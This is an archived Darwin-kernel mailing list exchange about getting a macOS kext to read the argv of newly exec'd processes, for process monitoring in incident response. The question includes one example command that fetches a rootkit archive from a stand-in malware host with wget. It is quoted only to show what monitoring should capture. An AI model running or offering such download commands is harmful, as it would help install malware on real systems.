• Open Menu Close Menu
  • Apple
  • Shopping Bag
  • Apple
  • Mac
  • iPad
  • iPhone
  • Watch
  • TV
  • Music
  • Support
  • Search apple.com
  • Shopping Bag

Lists

Open Menu Close Menu
  • Terms and Conditions
  • Lists hosted on this site
  • Email the Postmaster
  • Tips for posting to public mailing lists
Re: accessing argv on exec
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: accessing argv on exec

  • Subject: Re: accessing argv on exec
  • From: Evan Lojewski <email@hidden>
  • Date: Tue, 11 Nov 2014 08:18:35 -0700
Hi Pete,

From my (limited) scan through kern_exec.c, it doesn't look like there is a good way get access to the full command line. Someone at Apple will probably be able to suggest a good option.

*IF* this is a non-production kext, it is possible to update the execsw table to allow your kext to get access to this information, however it does require using private symbols. If you'd like an example on how to do that let me know and I'll send some code, but hopefully Apple has a better option that they can reply with first.

-- Evan Lojewski

On Mon, Nov 10, 2014 at 4:02 PM, Peter Moody <email@hidden> wrote:
Hey folks,

apologies for what will likely be a noobish question, I'm just getting
acquainted with xnu and kexts and all that.

I'm interested in monitoring process creation (and termination) on the
mac. It looks like I can use a kext that registers a listener for
kauth_fileop_exec to be notified of an exec, and the callback is:

 a) given a char* of the path the binary.
 b) run in the context of the newly executing binary (so proc_self()
 and the like work for getting pid/ppid, etc).

but is there anyway that I can actually access the argv that was passed
to the execve call?

I'm trying to do this to help our incident response capabilities, where
obviously just seeing that 'wget' was called is a lot less informative
than seeing 'wget http://malware.badguy/rookkit.tgz'

 Cheers,
 peter
 _______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:

This email sent to email@hidden

 _______________________________________________
Do not post admin requests to the list. They will be ignored.
Darwin-kernel mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:

This email sent to email@hidden
  • Follow-Ups:
    • Re: accessing argv on exec
      • From: Peter Moody <email@hidden>
References: 
 >accessing argv on exec (From: Peter Moody <email@hidden>)

  • Prev by Date: accessing argv on exec
  • Next by Date: Re: accessing argv on exec
  • Previous by thread: accessing argv on exec
  • Next by thread: Re: accessing argv on exec
  • Index(es):
    • Date
    • Thread